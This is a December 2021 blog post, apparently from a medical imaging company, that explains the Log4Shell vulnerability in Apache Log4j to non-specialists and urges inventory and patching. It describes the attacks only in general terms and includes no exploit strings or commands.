"Not another cybersecurity
attack?!"
(First, let me preface this blog by stating that as of
today, December 22, 2021, no CMS Imaging systems have been impacted by Log4j
malware.)
Yes, last week, it became evident that researchers
had identified another large-scale cybersecurity issue. This attack was a
malware insertion on a Java program named Apache Log4j. Log4j is a free tool
used by many software programs to log information in places like your hospital
network, personal cloud storage, and, unfortunately, medical equipment and
software. The attack itself is being called Log4Shell, and it is set to become
the most extensive and worst cybersecurity attack in history.
Most software today is developed using a mixture of frameworks. (Please note that
the following example is overly simplified and probably will cause a software
developer's head to explode, but I will use it for ease of understanding.) For
example, if you want to write a piece of software to access a personal picture
vault, you might first use a Single Sign-On framework such as Okta or Jumpcloud
to sign in to your vault. Then once inside your picture vault, you'd like to be
able to store and access your pictures; you might use Storage Access Framework
for Android or Photokit for Apple, depending on your platform. If you want to
share an image, you would use an image-sharing framework such as XMPP or CoCam.
Lastly, if you want to know when you last signed in or if your friend opened the
image you shared, you would use a logging framework such as Log4j to track and
record all operations of your software.
Security professionals believe
hackers have been exploiting the bug since the beginning of December. Still, the
general public only became aware of the attack last week because the frequency
and depth of the attacks increased dramatically last week. Companies such as
Microsoft, Google Cloud, Apple iCloud, Amazon Web Services, and Cisco have all
found exploitations in some of their servers. A string of code logged by a
server opens it to hackers to exploit with ransomware or any other type of
malware. One way that bad actors can insert this code string is by sending an
email with the code embedded in the headers or attaching it to the account
username. The scariest part of this attack is that the recipient did not have to
open the email, but the email simply had to be delivered. Other ways to carry
out this attack would be to trigger a log message on a database. Again this is a
lot more complicated in practice, but for simplification, searching from a
website's search bar using the malicious code as the text will generate a 404
error (that darned 'page not found' error), which will, in turn, log that 404
error onto the website's database. If you are evil and have bad intent, and the
website uses the exploited version of Log4j, you have just hacked that
server.
Think about Log4Shell as a key to the front door of your server.
Once inside, they can virtually lock the doors from the inside by changing the
passwords to your servers, downloading credentials, or installing cryptocurrency
mining bots. As they have the keys to the castle, they can also download all
information stored on these servers, such as Personal Health Information or PHI.
While most large tech companies have started applying fixes to prevent further
incursion and removing the code string from servers, many smaller companies do
not have the resources to move as quickly. So far, the Log4j exploit has seen
mostly cryptocurrency miners and a few instances of ransomware. But most
disturbingly, there is evidence that hacking groups working on behalf of
particular nation-states are targetting other national governments and
infrastructure.
The next phase of this nightmare will be bad actors
setting up automated processes to search for vulnerable systems and then
inserting the malware into the system using any of a number of ways. Once they
have exploited a particular server, they can infect it with malware, or worse,
sell that access to even worse entities. These entities may monitor and download
information to be used as a hostage until the vulnerability is fixed and do so
indefinitely.
As you can imagine, the Apache Software Foundation has
already created a patch to close the loop on this vulnerability. Also, the
vulnerability did not exploit any Log4j version below 2.0. But the damage is
still over. To stop this hack, security engineers need to inventory all of the
software and servers that a business or government entity may use, identify
those using Log4j, and then patch each incidence. Think about all of the
passwords you have accumulated in your lifetime, then acknowledge that each
password is tied to a unique piece of software or server. Because Log4j is
open-sourced and free, there is no way to estimate how many programs use it as
their logging framework.
Unfortunately, we will continue to see new and
different ways to exploit to Log4Shell in the future, and according to Sean
Gallagher, a senior threat researcher at cybersecurity company Sophos, "It's
going to be around as long as the internet."
So let's keep our fingers
crossed that Log4Shell does not play the role of the Grinch before this holiday
season and into 2021.
Comments
Leave a Comment